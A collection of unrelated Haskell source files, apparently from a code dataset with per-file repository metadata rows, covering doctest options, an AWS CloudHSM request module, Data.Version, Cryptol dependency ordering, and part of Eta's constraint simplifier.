printAndExit :: String -> IO a
printAndExit s = putStr s >> exitWith ExitSuccess
usage = usageInfo "Usage: doctest [OPTION]... MODULE...\n" documentedOptions
tryHelp message = printAndExit $ "doctest: " ++ message
++ "Try `doctest --help' for more information.\n"
-- | Extract all ghc options from given list of options.
--
-- Example:
--
-- >>> ghcOptions [Help, GhcOption "-foo", Verbose, GhcOption "-bar"]
-- ["-foo","-bar"]
ghcOptions :: [Option] -> [String]
ghcOptions opts = [ option | GhcOption option <- opts ]
-- | Format given list of options for Haddock.
haddockOptions :: [Option] -> [Haddock.Flag]
haddockOptions opts = verbosity ++ ghcOpts
where
verbosity = if (Verbose `elem` opts) then [Haddock.Flag_Verbosity "3"] else [Haddock.Flag_Verbosity "0", Haddock.Flag_NoWarnings]
ghcOpts = map Haddock.Flag_OptGhc $ ghcOptions opts
| beni55/doctest-haskell | src/Options.hs | mit | 2,188 | 0 | 12 | 504 | 565 | 309 | 256 | 45 | 2 |
module TestModule (
DataName (..),
TypeSynonymBool,
ClassName,
functionBool
) where
import Prelude
data DataName dataVariable = DataName dataVariable Bool deriving (Show, Eq)
type TypeSynonymBool = Bool
class ClassName classVariable where
method :: classVariable
instance ClassName Bool where
method = True
functionBool :: a -> Bool
functionBool _ = True
functionInt :: a -> Int
functionInt _ = 0
functionId :: a -> a
functionId a = a
| adarqui/ToyBox | haskell/bmillwood/haskell-src-meta/examples/TestModule.hs | gpl-3.0 | 465 | 0 | 6 | 97 | 132 | 75 | 57 | 18 | 1 |
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
{-# OPTIONS_GHC -fno-warn-unused-binds #-}
{-# OPTIONS_GHC -fno-warn-unused-matches #-}
-- Derived from AWS service descriptions, licensed under Apache 2.0.
-- |
-- Module : Network.AWS.CloudHSM.DescribeHAPG
-- Copyright : (c) 2013-2015 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <brendan.g.hay@gmail.com>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
-- Retrieves information about a high-availability partition group.
--
-- /See:/ <http://docs.aws.amazon.com/cloudhsm/latest/dg/API_DescribeHAPG.html AWS API Reference> for DescribeHAPG.
module Network.AWS.CloudHSM.DescribeHAPG
(
-- * Creating a Request
describeHAPG
, DescribeHAPG
-- * Request Lenses
, dhapgHAPGARN
-- * Destructuring the Response
, describeHAPGResponse
, DescribeHAPGResponse
-- * Response Lenses
, dhapgrsState
, dhapgrsLastModifiedTimestamp
, dhapgrsHSMsPendingRegistration
, dhapgrsHSMsPendingDeletion
, dhapgrsHAPGSerial
, dhapgrsHSMsLastActionFailed
, dhapgrsPartitionSerialList
, dhapgrsHAPGARN
, dhapgrsLabel
, dhapgrsResponseStatus
) where
import Network.AWS.CloudHSM.Types
import Network.AWS.CloudHSM.Types.Product
import Network.AWS.Prelude
import Network.AWS.Request
import Network.AWS.Response
-- | Contains the inputs for the DescribeHapg action.
--
-- /See:/ 'describeHAPG' smart constructor.
newtype DescribeHAPG = DescribeHAPG'
{ _dhapgHAPGARN :: Text
} deriving (Eq,Read,Show,Data,Typeable,Generic)
-- | Creates a value of 'DescribeHAPG' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'dhapgHAPGARN'
describeHAPG
:: Text -- ^ 'dhapgHAPGARN'
-> DescribeHAPG
describeHAPG pHAPGARN_ =
DescribeHAPG'
{ _dhapgHAPGARN = pHAPGARN_
}
-- | The ARN of the high-availability partition group to describe.
dhapgHAPGARN :: Lens' DescribeHAPG Text
dhapgHAPGARN = lens _dhapgHAPGARN (\ s a -> s{_dhapgHAPGARN = a});
instance AWSRequest DescribeHAPG where
type Rs DescribeHAPG = DescribeHAPGResponse
request = postJSON cloudHSM
response
= receiveJSON
(\ s h x ->
DescribeHAPGResponse' <$>
(x .?> "State") <*> (x .?> "LastModifiedTimestamp")
<*> (x .?> "HsmsPendingRegistration" .!@ mempty)
<*> (x .?> "HsmsPendingDeletion" .!@ mempty)
<*> (x .?> "HapgSerial")
<*> (x .?> "HsmsLastActionFailed" .!@ mempty)
<*> (x .?> "PartitionSerialList" .!@ mempty)
<*> (x .?> "HapgArn")
<*> (x .?> "Label")
<*> (pure (fromEnum s)))
instance ToHeaders DescribeHAPG where
toHeaders
= const
(mconcat
["X-Amz-Target" =#
("CloudHsmFrontendService.DescribeHapg" ::
ByteString),
"Content-Type" =#
("application/x-amz-json-1.1" :: ByteString)])
instance ToJSON DescribeHAPG where
toJSON DescribeHAPG'{..}
= object
(catMaybes [Just ("HapgArn" .= _dhapgHAPGARN)])
instance ToPath DescribeHAPG where
toPath = const "/"
instance ToQuery DescribeHAPG where
toQuery = const mempty
-- | Contains the output of the DescribeHapg action.
--
-- /See:/ 'describeHAPGResponse' smart constructor.
data DescribeHAPGResponse = DescribeHAPGResponse'
{ _dhapgrsState :: !(Maybe CloudHSMObjectState)
, _dhapgrsLastModifiedTimestamp :: !(Maybe Text)
, _dhapgrsHSMsPendingRegistration :: !(Maybe [Text])
, _dhapgrsHSMsPendingDeletion :: !(Maybe [Text])
, _dhapgrsHAPGSerial :: !(Maybe Text)
, _dhapgrsHSMsLastActionFailed :: !(Maybe [Text])
, _dhapgrsPartitionSerialList :: !(Maybe [Text])
, _dhapgrsHAPGARN :: !(Maybe Text)
, _dhapgrsLabel :: !(Maybe Text)
, _dhapgrsResponseStatus :: !Int
} deriving (Eq,Read,Show,Data,Typeable,Generic)
-- | Creates a value of 'DescribeHAPGResponse' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'dhapgrsState'
--
-- * 'dhapgrsLastModifiedTimestamp'
--
-- * 'dhapgrsHSMsPendingRegistration'
--
-- * 'dhapgrsHSMsPendingDeletion'
--
-- * 'dhapgrsHAPGSerial'
--
-- * 'dhapgrsHSMsLastActionFailed'
--
-- * 'dhapgrsPartitionSerialList'
--
-- * 'dhapgrsHAPGARN'
--
-- * 'dhapgrsLabel'
--
-- * 'dhapgrsResponseStatus'
describeHAPGResponse
:: Int -- ^ 'dhapgrsResponseStatus'
-> DescribeHAPGResponse
describeHAPGResponse pResponseStatus_ =
DescribeHAPGResponse'
{ _dhapgrsState = Nothing
, _dhapgrsLastModifiedTimestamp = Nothing
, _dhapgrsHSMsPendingRegistration = Nothing
, _dhapgrsHSMsPendingDeletion = Nothing
, _dhapgrsHAPGSerial = Nothing
, _dhapgrsHSMsLastActionFailed = Nothing
, _dhapgrsPartitionSerialList = Nothing
, _dhapgrsHAPGARN = Nothing
, _dhapgrsLabel = Nothing
, _dhapgrsResponseStatus = pResponseStatus_
}
-- | The state of the high-availability partition group.
dhapgrsState :: Lens' DescribeHAPGResponse (Maybe CloudHSMObjectState)
dhapgrsState = lens _dhapgrsState (\ s a -> s{_dhapgrsState = a});
-- | The date and time the high-availability partition group was last
-- modified.
dhapgrsLastModifiedTimestamp :: Lens' DescribeHAPGResponse (Maybe Text)
dhapgrsLastModifiedTimestamp = lens _dhapgrsLastModifiedTimestamp (\ s a -> s{_dhapgrsLastModifiedTimestamp = a});
-- | Undocumented member.
dhapgrsHSMsPendingRegistration :: Lens' DescribeHAPGResponse [Text]
dhapgrsHSMsPendingRegistration = lens _dhapgrsHSMsPendingRegistration (\ s a -> s{_dhapgrsHSMsPendingRegistration = a}) . _Default . _Coerce;
-- | Undocumented member.
dhapgrsHSMsPendingDeletion :: Lens' DescribeHAPGResponse [Text]
dhapgrsHSMsPendingDeletion = lens _dhapgrsHSMsPendingDeletion (\ s a -> s{_dhapgrsHSMsPendingDeletion = a}) . _Default . _Coerce;
-- | The serial number of the high-availability partition group.
dhapgrsHAPGSerial :: Lens' DescribeHAPGResponse (Maybe Text)
dhapgrsHAPGSerial = lens _dhapgrsHAPGSerial (\ s a -> s{_dhapgrsHAPGSerial = a});
-- | Undocumented member.
dhapgrsHSMsLastActionFailed :: Lens' DescribeHAPGResponse [Text]
dhapgrsHSMsLastActionFailed = lens _dhapgrsHSMsLastActionFailed (\ s a -> s{_dhapgrsHSMsLastActionFailed = a}) . _Default . _Coerce;
-- | The list of partition serial numbers that belong to the
-- high-availability partition group.
dhapgrsPartitionSerialList :: Lens' DescribeHAPGResponse [Text]
dhapgrsPartitionSerialList = lens _dhapgrsPartitionSerialList (\ s a -> s{_dhapgrsPartitionSerialList = a}) . _Default . _Coerce;
-- | The ARN of the high-availability partition group.
dhapgrsHAPGARN :: Lens' DescribeHAPGResponse (Maybe Text)
dhapgrsHAPGARN = lens _dhapgrsHAPGARN (\ s a -> s{_dhapgrsHAPGARN = a});
-- | The label for the high-availability partition group.
dhapgrsLabel :: Lens' DescribeHAPGResponse (Maybe Text)
dhapgrsLabel = lens _dhapgrsLabel (\ s a -> s{_dhapgrsLabel = a});
-- | The response status code.
dhapgrsResponseStatus :: Lens' DescribeHAPGResponse Int
dhapgrsResponseStatus = lens _dhapgrsResponseStatus (\ s a -> s{_dhapgrsResponseStatus = a});
| fmapfmapfmap/amazonka | amazonka-cloudhsm/gen/Network/AWS/CloudHSM/DescribeHAPG.hs | mpl-2.0 | 7,772 | 0 | 20 | 1,677 | 1,280 | 754 | 526 | 141 | 1 |
-----------------------------------------------------------------------------
-- |
-- Module : Data.Version
-- Copyright : (c) The University of Glasgow 2004
-- License : BSD-style (see the file libraries/base/LICENSE)
--
-- Maintainer : libraries@haskell.org
-- Stability : experimental
-- Portability : non-portable (local universal quantification in ReadP)
--
-- A general library for representation and manipulation of versions.
--
-- Versioning schemes are many and varied, so the version
-- representation provided by this library is intended to be a
-- compromise between complete generality, where almost no common
-- functionality could reasonably be provided, and fixing a particular
-- versioning scheme, which would probably be too restrictive.
--
-- So the approach taken here is to provide a representation which
-- subsumes many of the versioning schemes commonly in use, and we
-- provide implementations of 'Eq', 'Ord' and conversion to\/from 'String'
-- which will be appropriate for some applications, but not all.
--
-----------------------------------------------------------------------------
module Data.Version (
-- * The @Version@ type
Version(..),
-- * A concrete representation of @Version@
showVersion, parseVersion,
) where
import Prelude -- necessary to get dependencies right
-- These #ifdefs are necessary because this code might be compiled as
-- part of ghc/lib/compat, and hence might be compiled by an older version
-- of GHC. In which case, we might need to pick up ReadP from
-- Distribution.Compat.ReadP, because the version in
-- Text.ParserCombinators.ReadP doesn't have all the combinators we need.
#if __GLASGOW_HASKELL__ >= 603 || __HUGS__ || __NHC__
import Text.ParserCombinators.ReadP
#else
import Distribution.Compat.ReadP
#endif
#if !__GLASGOW_HASKELL__
import Data.Typeable ( Typeable, TyCon, mkTyCon, mkTyConApp )
#elif __GLASGOW_HASKELL__ < 602
import Data.Dynamic ( Typeable(..), TyCon, mkTyCon, mkAppTy )
#else
import Data.Typeable ( Typeable )
#endif
import Data.List ( intersperse, sort )
import Control.Monad ( liftM )
import Data.Char ( isDigit, isAlphaNum )
{- |
A 'Version' represents the version of a software entity.
An instance of 'Eq' is provided, which implements exact equality
modulo reordering of the tags in the 'versionTags' field.
An instance of 'Ord' is also provided, which gives lexicographic
ordering on the 'versionBranch' fields (i.e. 2.1 > 2.0, 1.2.3 > 1.2.2,
etc.). This is expected to be sufficient for many uses, but note that
you may need to use a more specific ordering for your versioning
scheme. For example, some versioning schemes may include pre-releases
which have tags @\"pre1\"@, @\"pre2\"@, and so on, and these would need to
be taken into account when determining ordering. In some cases, date
ordering may be more appropriate, so the application would have to
look for @date@ tags in the 'versionTags' field and compare those.
The bottom line is, don't always assume that 'compare' and other 'Ord'
operations are the right thing for every 'Version'.
Similarly, concrete representations of versions may differ. One
possible concrete representation is provided (see 'showVersion' and
'parseVersion'), but depending on the application a different concrete
representation may be more appropriate.
-}
data Version =
Version { versionBranch :: [Int],
-- ^ The numeric branch for this version. This reflects the
-- fact that most software versions are tree-structured; there
-- is a main trunk which is tagged with versions at various
-- points (1,2,3...), and the first branch off the trunk after
-- version 3 is 3.1, the second branch off the trunk after
-- version 3 is 3.2, and so on. The tree can be branched
-- arbitrarily, just by adding more digits.
--
-- We represent the branch as a list of 'Int', so
-- version 3.2.1 becomes [3,2,1]. Lexicographic ordering
-- (i.e. the default instance of 'Ord' for @[Int]@) gives
-- the natural ordering of branches.
versionTags :: [String] -- really a bag
-- ^ A version can be tagged with an arbitrary list of strings.
-- The interpretation of the list of tags is entirely dependent
-- on the entity that this version applies to.
}
deriving (Read,Show
#if __GLASGOW_HASKELL__ >= 602
,Typeable
#endif
)
#if !__GLASGOW_HASKELL__
versionTc :: TyCon
versionTc = mkTyCon "Version"
instance Typeable Version where
typeOf _ = mkTyConApp versionTc []
#elif __GLASGOW_HASKELL__ < 602
versionTc :: TyCon
versionTc = mkTyCon "Version"
instance Typeable Version where
typeOf _ = mkAppTy versionTc []
#endif
instance Eq Version where
v1 == v2 = versionBranch v1 == versionBranch v2
&& sort (versionTags v1) == sort (versionTags v2)
-- tags may be in any order
instance Ord Version where
v1 `compare` v2 = versionBranch v1 `compare` versionBranch v2
-- -----------------------------------------------------------------------------
-- A concrete representation of 'Version'
-- | Provides one possible concrete representation for 'Version'. For
-- a version with 'versionBranch' @= [1,2,3]@ and 'versionTags'
-- @= [\"tag1\",\"tag2\"]@, the output will be @1.2.3-tag1-tag2@.
--
showVersion :: Version -> String
showVersion (Version branch tags)
= concat (intersperse "." (map show branch)) ++
concatMap ('-':) tags
-- | A parser for versions in the format produced by 'showVersion'.
--
#if __GLASGOW_HASKELL__ >= 603 || __HUGS__
parseVersion :: ReadP Version
#elif __NHC__
parseVersion :: ReadPN r Version
#else
parseVersion :: ReadP r Version
#endif
parseVersion = do branch <- sepBy1 (liftM read $ munch1 isDigit) (char '.')
tags <- many (char '-' >> munch1 isAlphaNum)
return Version{versionBranch=branch, versionTags=tags}
| alekar/hugs | packages/base/Data/Version.hs | bsd-3-clause | 5,841 | 18 | 11 | 1,039 | 486 | 292 | 194 | 30 | 1 |
{-# LANGUAGE CPP #-}
-- !!! "/" was not recognised as a directory in 6.0.x
import System.Directory
#ifdef mingw32_HOST_OS
root = "C:\\"
#else
root = "/"
#endif
main = doesDirectoryExist root >>= print
| DavidAlphaFox/ghc | libraries/directory/tests/doesDirectoryExist001.hs | bsd-3-clause | 203 | 0 | 6 | 35 | 28 | 17 | 11 | 4 | 1 |
-- |
-- Module : $Header$
-- Copyright : (c) 2013-2014 Galois, Inc.
-- License : BSD3
-- Maintainer : cryptol@galois.com
-- Stability : provisional
-- Portability : portable
{-# LANGUAGE Safe #-}
module Cryptol.TypeCheck.Depends where
import qualified Cryptol.Parser.AST as P
import Cryptol.Parser.Position(Range, Located(..), thing)
import Cryptol.TypeCheck.AST(QName)
import Cryptol.Parser.Names (namesB, namesT)
import Cryptol.TypeCheck.Monad( InferM, recordError, getTVars
, Error(..))
import Data.List(sortBy, groupBy)
import Data.Function(on)
import Data.Maybe(mapMaybe)
import Data.Graph.SCC(stronglyConnComp)
import Data.Graph (SCC(..))
import Data.Map (Map)
import qualified Data.Map as Map
import qualified Data.Set as Set
data TyDecl = TS P.TySyn | NT P.Newtype
-- | Check for duplicate and recursive type synonyms.
-- Returns the type-synonyms in dependecy order.
orderTyDecls :: [TyDecl] -> InferM [TyDecl]
orderTyDecls ts =
do vs <- getTVars
ds <- combine $ map (toMap vs) ts
let ordered = mkScc [ (t,[x],deps)
| (x,(t,deps)) <- Map.toList (Map.map thing ds) ]
concat `fmap` mapM check ordered
where
toMap vs ty@(NT (P.Newtype x as fs)) =
( thing x
, x { thing = (ty, Set.toList $
Set.difference
(Set.unions (map (namesT vs . P.value) fs))
(Set.fromList (map P.tpQName as))
)
}
)
toMap vs ty@(TS (P.TySyn x as t)) =
(thing x
, x { thing = (ty, Set.toList $
Set.difference (namesT vs t)
(Set.fromList (map P.tpQName as)))
}
)
getN (TS (P.TySyn x _ _)) = x
getN (NT x) = P.nName x
check (AcyclicSCC x) = return [x]
-- We don't support any recursion, for now.
-- We could support recursion between newtypes, or newtypes and tysysn.
check (CyclicSCC xs) =
do recordError (RecursiveTypeDecls (map getN xs))
return [] -- XXX: This is likely to cause fake errors for missing
-- type synonyms. We could avoid this by, for example, checking
-- for recursive synonym errors, when looking up tycons.
-- | Associate type signatures with bindings and order bindings by dependency.
orderBinds :: [P.Bind] -> [SCC P.Bind]
orderBinds bs = mkScc [ (b, map thing defs, Set.toList uses)
| b <- bs
, let (defs,uses) = namesB b
]
class FromDecl d where
toBind :: d -> Maybe P.Bind
toTyDecl :: d -> Maybe TyDecl
instance FromDecl P.TopDecl where
toBind (P.Decl x) = toBind (P.tlValue x)
toBind _ = Nothing
toTyDecl (P.TDNewtype d) = Just (NT (P.tlValue d))
toTyDecl (P.Decl x) = toTyDecl (P.tlValue x)
toTyDecl _ = Nothing
instance FromDecl P.Decl where
toBind (P.DLocated d _) = toBind d
toBind (P.DBind b) = return b
toBind _ = Nothing
toTyDecl (P.DLocated d _) = toTyDecl d
toTyDecl (P.DType x) = Just (TS x)
toTyDecl _ = Nothing
{- | Given a list of declarations, annoted with (i) the names that they
define, and (ii) the names that they use, we compute a list of strongly
connected components of the declarations. The SCCs are in dependency order. -}
mkScc :: [(a,[QName],[QName])] -> [SCC a]
mkScc ents = stronglyConnComp $ zipWith mkGr keys ents
where
keys = [ 0 :: Integer .. ]
mkGr i (x,_,uses) = (x,i,mapMaybe (`Map.lookup` nodeMap) uses)
-- Maps names to node ids.
nodeMap = Map.fromList $ concat $ zipWith mkNode keys ents
mkNode i (_,defs,_) = [ (d,i) | d <- defs ]
{- | Combine a bunch of definitions into a single map. Here we check
that each name is defined only onces. -}
combineMaps :: [Map QName (Located a)] -> InferM (Map QName (Located a))
combineMaps ms =
do mapM_ recordError $
do m <- ms
(x,rs) <- duplicates [ a { thing = x } | (x,a) <- Map.toList m ]
return (RepeatedDefinitions x rs)
return (Map.unions ms)
{- | Combine a bunch of definitions into a single map. Here we check
that each name is defined only onces. -}
combine :: [(QName, Located a)] -> InferM (Map QName (Located a))
combine m =
do mapM_ recordError $
do (x,rs) <- duplicates [ a { thing = x } | (x,a) <- m ]
return (RepeatedDefinitions x rs)
return (Map.fromList m)
-- | Identify multiple occurances of something.
duplicates :: Ord a => [Located a] -> [(a,[Range])]
duplicates = mapMaybe multiple
. groupBy ((==) `on` thing)
. sortBy (compare `on` thing)
where
multiple xs@(x : _ : _) = Just (thing x, map srcRange xs)
multiple _ = Nothing
| TomMD/cryptol | src/Cryptol/TypeCheck/Depends.hs | bsd-3-clause | 5,000 | 0 | 19 | 1,572 | 1,552 | 834 | 718 | 86 | 4 |
module Csound.Control.Overload(
Outs(..), onArg, MidiInstr(..), MidiInstrTemp(..), AmpInstr(..), CpsInstr(..)
) where
import Csound.Control.Overload.Outs
import Csound.Control.Overload.MidiInstr
import Csound.Control.Overload.SpecInstr
| silky/csound-expression | src/Csound/Control/Overload.hs | bsd-3-clause | 250 | 0 | 5 | 30 | 68 | 48 | 20 | 5 | 0 |
module Eta.TypeCheck.TcSimplify(
simplifyInfer,
quantifyPred, growThetaTyVars,
simplifyAmbiguityCheck,
simplifyDefault,
simplifyRule, simplifyTop, simplifyInteractive,
solveWantedsTcM, simplifyWantedsTcM,
tcCheckSatisfiability,
captureTopConstraints
) where
import qualified Eta.LanguageExtensions as LangExt
import Eta.TypeCheck.TcRnTypes
import Eta.TypeCheck.TcRnMonad
import qualified Eta.TypeCheck.TcRnMonad as TcRnMonad
import qualified Eta.TypeCheck.TcRnMonad as TcM
import Eta.TypeCheck.TcErrors
import Eta.TypeCheck.TcMType as TcM
import Eta.TypeCheck.TcType
import Eta.TypeCheck.TcSMonad as TcS
import Eta.TypeCheck.TcInteract
import Eta.Types.Kind ( isKind, isSubKind, defaultKind_maybe )
import Eta.TypeCheck.Inst
import Eta.Types.Type ( classifyPredType, isIPClass, PredTree(..)
, getClassPredTys_maybe, EqRel(..))
import Eta.Types.TyCon ( isTypeFamilyTyCon )
import Eta.Types.Class ( Class )
import Eta.BasicTypes.Id ( idType )
import Eta.BasicTypes.Var
import Eta.BasicTypes.Unique
import Eta.BasicTypes.VarSet
import Eta.TypeCheck.TcEvidence
import Eta.BasicTypes.Name
import Eta.Utils.Bag
import Eta.Utils.ListSetOps
import Eta.Utils.Util
import Eta.Prelude.PrelInfo
import Eta.Prelude.PrelNames
import Control.Monad ( unless )
import Eta.Types.Class ( classKey )
import Eta.BasicTypes.BasicTypes ( RuleName )
import Eta.Utils.Outputable
import Eta.Utils.FastString
import Eta.Core.TrieMap () -- DV: for now
import Data.List( partition )
{-
*********************************************************************************
* *
* External interface *
* *
*********************************************************************************
-}
captureTopConstraints :: TcM a -> TcM (a, WantedConstraints)
-- (captureTopConstraints m) runs m, and returns the type constraints it
-- generates plus the constraints produced by static forms inside.
-- If it fails with an exception, it reports any insolubles
-- (out of scope variables) before doing so
captureTopConstraints thing_inside
= do { static_wc_var <- TcM.newTcRef emptyWC ;
; (mb_res, lie) <- TcM.updGblEnv (\env -> env { tcg_static_wc = static_wc_var } ) $
TcM.tryCaptureConstraints thing_inside
; stWC <- TcM.readTcRef static_wc_var
-- See TcRnMonad Note [Constraints and errors]
-- If the thing_inside threw an exception, but generated some insoluble
-- constraints, report the latter before propagating the exception
-- Otherwise they will be lost altogether
; case mb_res of
Right res -> return (res, lie `andWC` stWC)
Left {} -> do { _ <- reportUnsolved lie; failM } }
-- This call to reportUnsolved is the reason
-- this function is here instead of TcRnMonad
simplifyTop :: WantedConstraints -> TcM (Bag EvBind)
-- Simplify top-level constraints
-- Usually these will be implications,
-- but when there is nothing to quantify we don't wrap
-- in a degenerate implication, so we do that here instead
simplifyTop wanteds
= do { traceTc "simplifyTop {" $ text "wanted = " <+> ppr wanteds
; ev_binds_var <- TcM.newTcEvBinds
; zonked_final_wc <- solveWantedsTcMWithEvBinds ev_binds_var wanteds simpl_top
; binds1 <- TcRnMonad.getTcEvBinds ev_binds_var
; traceTc "End simplifyTop }" empty
; traceTc "reportUnsolved {" empty
; binds2 <- reportUnsolved zonked_final_wc
; traceTc "reportUnsolved }" empty
; return (binds1 `unionBags` binds2) }
simpl_top :: WantedConstraints -> TcS WantedConstraints
-- See Note [Top-level Defaulting Plan]
simpl_top wanteds
= do { (again, wc_first_go) <- reportUnifiedExtends $ nestTcS (solveWantedsAndDrop wanteds)
-- This is where the main work happens
; if again then simpl_top wc_first_go else try_tyvar_defaulting wc_first_go }
where
try_tyvar_defaulting :: WantedConstraints -> TcS WantedConstraints
try_tyvar_defaulting wc
| isEmptyWC wc
= return wc
| otherwise
= do { free_tvs <- TcS.zonkTyVarsAndFV (tyVarsOfWC wc)
; let meta_tvs = varSetElems (filterVarSet isMetaTyVar free_tvs)
-- zonkTyVarsAndFV: the wc_first_go is not yet zonked
-- filter isMetaTyVar: we might have runtime-skolems in GHCi,
-- and we definitely don't want to try to assign to those!
; meta_tvs' <- mapM defaultTyVar meta_tvs -- Has unification side effects
; if meta_tvs' == meta_tvs -- No defaulting took place;
-- (defaulting returns fresh vars)
then try_class_defaulting wc
else do { wc_residual <- nestTcS (solveWantedsAndDrop wc)
-- See Note [Must simplify after defaulting]
; try_class_defaulting wc_residual } }
try_class_defaulting :: WantedConstraints -> TcS WantedConstraints
try_class_defaulting wc
| isEmptyWC wc
= return wc
| otherwise -- See Note [When to do type-class defaulting]
= do { something_happened <- applyDefaultingRules (approximateWC wc)
-- See Note [Top-level Defaulting Plan]
; if something_happened
then do { wc_residual <- nestTcS (solveWantedsAndDrop wc)
; try_class_defaulting wc_residual }
-- See Note [Overview of implicit CallStacks]
else try_callstack_defaulting wc }
try_callstack_defaulting :: WantedConstraints -> TcS WantedConstraints
try_callstack_defaulting wc
| isEmptyWC wc
= return wc
| otherwise
= defaultCallStacks wc
-- | Default any remaining @CallStack@ constraints to empty @CallStack@s.
defaultCallStacks :: WantedConstraints -> TcS WantedConstraints
-- See Note [Overview of implicit CallStacks]
defaultCallStacks wanteds
= do simples <- handle_simples (wc_simple wanteds)
implics <- mapBagM handle_implic (wc_impl wanteds)
return (wanteds { wc_simple = simples, wc_impl = implics })
where
handle_simples simples
= catBagMaybes <$> mapBagM defaultCallStack simples
handle_implic implic = do
wanteds <- defaultCallStacks (ic_wanted implic)
return (implic { ic_wanted = wanteds })
defaultCallStack ct
| Just _ <- isCallStackPred (ctPred ct)
= do { solveCallStack (cc_ev ct) EvCsEmpty
; return Nothing }
defaultCallStack ct
= return (Just ct)
{-
Note [When to do type-class defaulting]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In GHC 7.6 and 7.8.2, we did type-class defaulting only if insolubleWC
was false, on the grounds that defaulting can't help solve insoluble
constraints. But if we *don't* do defaulting we may report a whole
lot of errors that would be solved by defaulting; these errors are
quite spurious because fixing the single insoluble error means that
defaulting happens again, which makes all the other errors go away.
This is jolly confusing: Trac #9033.
So it seems better to always do type-class defaulting.
However, always doing defaulting does mean that we'll do it in
situations like this (Trac #5934):
run :: (forall s. GenST s) -> Int
run = fromInteger 0
We don't unify the return type of fromInteger with the given function
type, because the latter involves foralls. So we're left with
(Num alpha, alpha ~ (forall s. GenST s) -> Int)
Now we do defaulting, get alpha := Integer, and report that we can't
match Integer with (forall s. GenST s) -> Int. That's not totally
stupid, but perhaps a little strange.
Another potential alternative would be to suppress *all* non-insoluble
errors if there are *any* insoluble errors, anywhere, but that seems
too drastic.
Note [Must simplify after defaulting]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
We may have a deeply buried constraint
(t:*) ~ (a:Open)
which we couldn't solve because of the kind incompatibility, and 'a' is free.
Then when we default 'a' we can solve the constraint. And we want to do
that before starting in on type classes. We MUST do it before reporting
errors, because it isn't an error! Trac #7967 was due to this.
Note [Top-level Defaulting Plan]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
We have considered two design choices for where/when to apply defaulting.
(i) Do it in SimplCheck mode only /whenever/ you try to solve some
simple constraints, maybe deep inside the context of implications.
This used to be the case in GHC 7.4.1.
(ii) Do it in a tight loop at simplifyTop, once all other constraint has
finished. This is the current story.
Option (i) had many disadvantages:
a) First it was deep inside the actual solver,
b) Second it was dependent on the context (Infer a type signature,
or Check a type signature, or Interactive) since we did not want
to always start defaulting when inferring (though there is an exception to
this see Note [Default while Inferring])
c) It plainly did not work. Consider typecheck/should_compile/DfltProb2.hs:
f :: Int -> Bool
f x = const True (\y -> let w :: a -> a
w a = const a (y+1)
in w y)
We will get an implication constraint (for beta the type of y):
[untch=beta] forall a. 0 => Num beta
which we really cannot default /while solving/ the implication, since beta is
untouchable.
Instead our new defaulting story is to pull defaulting out of the solver loop and
go with option (i), implemented at SimplifyTop. Namely:
- First have a go at solving the residual constraint of the whole program
- Try to approximate it with a simple constraint
- Figure out derived defaulting equations for that simple constraint
- Go round the loop again if you did manage to get some equations
Now, that has to do with class defaulting. However there exists type variable /kind/
defaulting. Again this is done at the top-level and the plan is:
- At the top-level, once you had a go at solving the constraint, do
figure out /all/ the touchable unification variables of the wanted constraints.
- Apply defaulting to their kinds
More details in Note [DefaultTyVar].
-}
------------------
simplifyAmbiguityCheck :: Type -> WantedConstraints -> TcM ()
simplifyAmbiguityCheck ty wanteds
= do { traceTc "simplifyAmbiguityCheck {" (text "type = " <+> ppr ty $$ text "wanted = " <+> ppr wanteds)
; ev_binds_var <- TcM.newTcEvBinds
; zonked_final_wc <- solveWantedsTcMWithEvBinds ev_binds_var wanteds simpl_top
; traceTc "End simplifyAmbiguityCheck }" empty
-- Normally report all errors; but with -XAllowAmbiguousTypes
-- report only insoluble ones, since they represent genuinely
-- inaccessible code
; allow_ambiguous <- xoptM LangExt.AllowAmbiguousTypes
; traceTc "reportUnsolved(ambig) {" empty
; unless (allow_ambiguous && not (insolubleWC zonked_final_wc))
(discardResult (reportUnsolved zonked_final_wc))
; traceTc "reportUnsolved(ambig) }" empty
; return () }
------------------
simplifyInteractive :: WantedConstraints -> TcM (Bag EvBind)
simplifyInteractive wanteds
= traceTc "simplifyInteractive" empty >>
simplifyTop wanteds
------------------
simplifyDefault :: ThetaType -- Wanted; has no type variables in it
-> TcM () -- Succeeds iff the constraint is soluble
simplifyDefault theta
= do { traceTc "simplifyInteractive" empty
; wanted <- newSimpleWanteds DefaultOrigin theta
; (unsolved, _binds) <- solveWantedsTcM (mkSimpleWC wanted)
; traceTc "reportUnsolved {" empty
-- See Note [Deferring coercion errors to runtime]
; reportAllUnsolved unsolved
-- Postcondition of solveWantedsTcM is that returned
-- constraints are zonked. So Precondition of reportUnsolved
-- is true.
; traceTc "reportUnsolved }" empty
; return () }
{-
*********************************************************************************
* *
* Inference
* *
***********************************************************************************
Note [Inferring the type of a let-bound variable]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Consider
f x = rhs
To infer f's type we do the following:
* Gather the constraints for the RHS with ambient level *one more than*
the current one. This is done by the call
captureConstraints (captureTcLevel (tcMonoBinds...))
in TcBinds.tcPolyInfer
* Call simplifyInfer to simplify the constraints and decide what to
quantify over. We pass in the level used for the RHS constraints,
here called rhs_tclvl.
This ensures that the implication constraint we generate, if any,
has a strictly-increased level compared to the ambient level outside
the let binding.
-}
simplifyInfer :: TcLevel -- Used when generating the constraints
-> Bool -- Apply monomorphism restriction
-> [(Name, TcTauType)] -- Variables to be generalised,
-- and their tau-types
-> WantedConstraints
-> TcM ([TcTyVar], -- Quantify over these type variables
[EvVar], -- ... and these constraints
Bool, -- The monomorphism restriction did something
-- so the results type is not as general as
-- it could be
TcEvBinds) -- ... binding these evidence variables
